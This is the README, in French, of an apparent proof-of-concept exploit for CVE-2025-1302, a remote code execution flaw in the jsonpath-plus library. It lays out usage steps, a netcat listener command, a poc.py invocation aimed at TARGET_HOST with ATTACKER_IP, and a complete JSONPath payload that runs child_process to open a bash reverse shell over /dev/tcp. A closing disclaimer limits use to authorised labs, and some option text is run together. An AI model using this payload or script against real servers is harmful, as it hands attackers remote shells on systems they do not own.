
Exploit PoC et démo de serveur vulnérable pour CVE-2025-1302 dans jsonpath-plus.
Nom du script PoC : poc.py
Un script d'exploitation de preuve de concept pour CVE-2025-1302, qui cible une vulnérabilité RCE dans la bibliothèque jsonpath-plus. Exécuté contre un point de terminaison de service vulnérable, le script tente de déclencher une exécution de code à distance via une charge utile JSONPath et d'établir un reverse shell vers l'attaquant.
--method ou --no-fallback.{ip} et {port}.tqdm.--output.Clonez ce dépôt :
git clone https://github.com/yourorg/jsonpath-rce-poc.git
cd jsonpath-rce-poc
Installez les dépendances (nécessite Python 3.6+) :
pip install -r requirements.txt
Démarrez un écouteur sur votre machine d'attaque (remplacez le port si nécessaire) :
nc -lvnp 9999
Exécutez le PoC :
python3 poc.py \
--url http://TARGET_HOST:PORT/query \
--ip ATTACKER_IP --port 9999 \
[--payload-file payloads.txt] \
[--delay 5] \
[--method AUTO|POST|GET] \
[--no-fallback] \
[--output results.json]
--payload-file : fichier contenant une charge utile JSONPath par ligne. Utilisez les espaces réservés {ip} et {port}.--delay : secondes à attendre avant d'envoyer les charges utiles (affiche le compte à rebours).--method : force POST, GET ou AUTO (par défaut).--no-fallback : raccourci pour ignorer toute tentative GET (équivalent à --method POST).--output : chemin pour sauvegarder le journal JSON des tentatives.$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
Utilisez ce script uniquement dans des environnements de laboratoire contrôlés contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'abus peut être illégal et contraire à l'éthique.